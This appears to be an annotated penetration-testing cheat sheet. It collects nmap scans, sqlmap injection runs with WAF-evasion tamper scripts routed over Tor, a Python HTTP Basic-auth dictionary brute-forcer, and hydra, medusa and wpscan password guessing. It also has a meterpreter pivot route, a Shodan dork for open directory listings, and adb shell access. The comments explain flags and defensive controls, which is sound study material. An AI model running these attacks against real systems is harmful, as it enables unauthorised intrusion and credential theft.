Will be updated occasionally.
# TCP SYN scan of all 65535 ports with OS/version detection and default scripts.
# -A already enables -sC and -sV (plus OS detection and traceroute), so those two
# flags are redundant here. -sS needs raw-socket privileges. --min-rate 5000 trades
# accuracy for speed and can miss ports on lossy links; a sweep at this rate is
# plainly visible in firewall and IDS logs.
nmap -sS -A -sC -sV -p- --min-rate 5000 [IP]
# UDP scan (-sU) of the 20 most common ports with default scripts and version
# detection. The documented spelling of the option is --top-ports.
nmap -sC -sV -sU -top-ports=20 [IP]
# Host discovery only (no port scan) across a CIDR range.
nmap -sn [IP/CIDR]
# Host discovery only, with targets read from file.txt (-iL).
nmap -sn -iL file.txt
# NOTE(review): nmap options are case-sensitive. `-pn` and `-o` look like typos for
# `-Pn` (skip host discovery) and `-O` (OS detection); as written, -p expects a port
# list and -o expects an output-format letter. Confirm the intent.
nmap -pn -o [IP]
# NOTE(review): -u takes the target URL as its value and none is given here, so the
# URL placeholder is missing after -u.
# --risk 3 adds OR-based tests; sqlmap's documentation warns these can modify every
# row when the injection point sits in an UPDATE/DELETE statement, so this setting is
# not safe against data that matters. --level 3 widens the tested inputs (sqlmap
# documents User-Agent/Referer header testing from level 3). --flush-session discards
# cached results for the target.
# The tamper scripts re-encode payloads to get past signature-based filtering. On the
# defending side this is why pattern matching alone is not a fix: parameterized
# queries remove the injection itself.
sqlmap -u --risk 3 --level 3 --random-agent --flush-session --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
# -r reads a saved raw HTTP request from the file named `1`. --time-sec=10 sets the
# delay used for time-based blind checks. Traffic is sent through a Tor SOCKS5 proxy.
sqlmap -r 1 --time-sec=10 --tor --tor-type=SOCKS5
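# Two wordlists: each line of urls.txt replaces the URL keyword, and params.txt,
# which carries no keyword of its own, feeds the default FUZZ keyword.
# Scheme typo fixed (was "hhtps"), which made the target URL invalid.
ffuf -w "urls.txt:URL" -w params.txt -u https://URL/FUZZ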
# Add a static route: traffic for 192.168.222.0/24 is sent via gateway 10.175.34.1.
# Needs root privileges, and a route added this way is not kept across a reboot.
ip route add 192.168.222.0/24 via 10.175.34.1
import requests
from bs4 import BeautifulSoup
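# Target protected by HTTP Basic authentication (a localhost lab instance) and the
# account whose password is being checked against a dictionary.
url = 'http://localhost/token/index.html'
username = 'anon'
password_dict = "password_dictionary.txt"
timeout = 5  # passed to requests.get as the per-request timeout

# Load the candidate passwords, stripping the trailing newline from each line.
# The context manager closes the file handle, which a bare open() would leave open.
with open(password_dict) as wordlist:
    lines = [line.rstrip('\n') for line in wordlist]

# Stays None when no candidate is accepted, so the final print cannot fail on an
# undefined name.
soup = None
for password in lines:
    print("Trying with password: ", password)
    auth = requests.auth.HTTPBasicAuth(username, password)
    # verify=False turns off TLS certificate checking. It has no effect on this
    # http:// URL, but would if the target were switched to https://.
    resp = requests.get(url=url, auth=auth, verify=False, timeout=timeout)
    # Success is inferred from the absence of this marker text, presumably the body
    # of the server's 401 page. Each rejected candidate is one failed request in the
    # server's access log, which is what lockout and rate-limit rules key on.
    if "Authorization Required" not in str(resp.text):
        print("Login successful with password: ", password)
        soup = BeautifulSoup(resp.text, 'html.parser')
        break

if soup is not None:
    print(soup.prettify())
else:
    print("No password in the dictionary was accepted")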
# ICMP sweep of the /24: -g generates the target list from the CIDR range and -a
# prints only hosts that answered. stderr is discarded to hide per-host error lines.
# Hosts that drop ICMP echo will not be listed even though they are up.
fping -a -g 10.10.200.0/24 2>/dev/null
meterpreter> run autoroute -s 192.69.228.0 -n 255.255.255.0
country:id http.title:"Index of /" + !Content-Length:207 + !Content-Length:623 + !Content-Length:447 + !Content-Length:481 + !Content-Length:529 + !Content-Length:770 + !Content-Length:558 + !Content-Length:556 + !Content-Length:555 + !Content-Length:683
# Generate a 4096-bit RSA private key. The key is written unencrypted, and because
# the file is created by shell redirection it gets the shell's default umask;
# tighten the permissions (e.g. chmod 600 domain.key) before using it.
openssl genrsa 4096 > domain.key
# Create a certificate signing request for that key (the subject is prompted for).
openssl req -new -key domain.key -out domain.csr
# Export only the client certificate from a PKCS#12 bundle: -clcerts skips CA
# certificates and -nokeys leaves the private key out of the output file.
openssl pkcs12 -in creds.pfx -clcerts -nokeys -out azmi-actalist.crt
# Save the leaf certificate the server presents for this SNI name; the empty stdin
# makes s_client exit after the handshake. s_client continues past verification
# errors by default, so the saved file is whatever the peer sent, not proof of
# identity. Compare its fingerprint out of band before trusting or pinning it.
echo -n | openssl s_client -connect azmi.my.id:443 -servername azmi.my.id | openssl x509 > azmi.cert
# Sign server.csr with a CA certificate and key: 500 days validity, SHA-256 digest.
# NOTE(review): -CAkey must be the private key that belongs to the -CA certificate;
# pairing cloudflare.crt with server.key looks mismatched. Confirm.
# `x509 -req` does not carry the CSR's requested extensions (e.g. subjectAltName)
# into the certificate unless they are supplied separately, for instance via -extfile.
openssl x509 -req -in server.csr -CA cloudflare.crt -CAkey server.key -CAcreateserial -out hasil.crt -days 500 -sha256
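# Online password guessing against network logins. On the defending side this shows
# up as a burst of failed logins from one source in the sshd, FTP or web server logs;
# account lockout, rate limiting and key-only SSH are the corresponding controls.
#
# medusa: one user (-u) against a password list (-P), SSH module on port 22.
medusa -h [IP ADRESS] -u [USER] -P [WORDLISTS] -M ssh -n 22
# medusa: user list (-U) and password list (-P) against FTP, verbosity level 6.
# A stray "h" in front of the host placeholder was removed.
medusa -v 6 -h [IP ADRESS] -U [USER WORDLISTS] -P [WORDLISTS] -M ftp
# hydra: one login (-l) with a password file (-P) against SSH, 4 parallel tasks.
hydra -l <username> -P <full path to pass> 10.10.196.192 -t 4 ssh
# hydra: web form login. The quoted argument is "path:POST body:F=failure text",
# with ^USER^ and ^PASS^ as substitution markers; -V prints every attempt.
hydra -l <username> -P <wordlist> 10.10.196.192 http-post-form "/:[POSTDATA ^USER^ ^PASS^]:F=[INCORRECT MESSAGE]" -V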
Scan OS:
# Two alternative commands, separated by " / " (not meant to be pasted as one line):
# -O runs OS detection only; -A adds version detection, default scripts and
# traceroute. Both sweep the whole /24.
nmap -O [IP ADRESS]/24 / nmap -A [IP ADRESS]/24
SCAN TCP NULL
# TCP NULL scan (-sN, no TCP flags set) with aggressive timing (-T4) and -A.
# The result depends on RFC 793 behaviour: ports are reported as open|filtered
# rather than open, and stacks that answer RST regardless of port state (nmap's
# documentation names Windows) make every port look closed.
nmap -sN -T4 -A [IP ADRESS]
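# WordPress login password guessing with wpscan. The option prefixes were en dashes
# ("–"), which a shell passes through as literal text; they are restored to "--".
# 50 threads produces a dense run of failed logins that login rate limiting or
# lockout on the WordPress side is meant to stop.
wpscan --url [website] --passwords [wordlists] --usernames [user] --max-threads 50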
Android Connection:
# Attach to a device's adb daemon over TCP, then open a shell on the device.
# An adb port reachable over the network hands a device shell to any host the device
# has authorised (or to anyone, on builds without adb authentication), so network
# adb should stay disabled outside a lab.
adb connect ip:port
adb shell
# Typed inside the device shell opened above, not on the host.
cd sdcard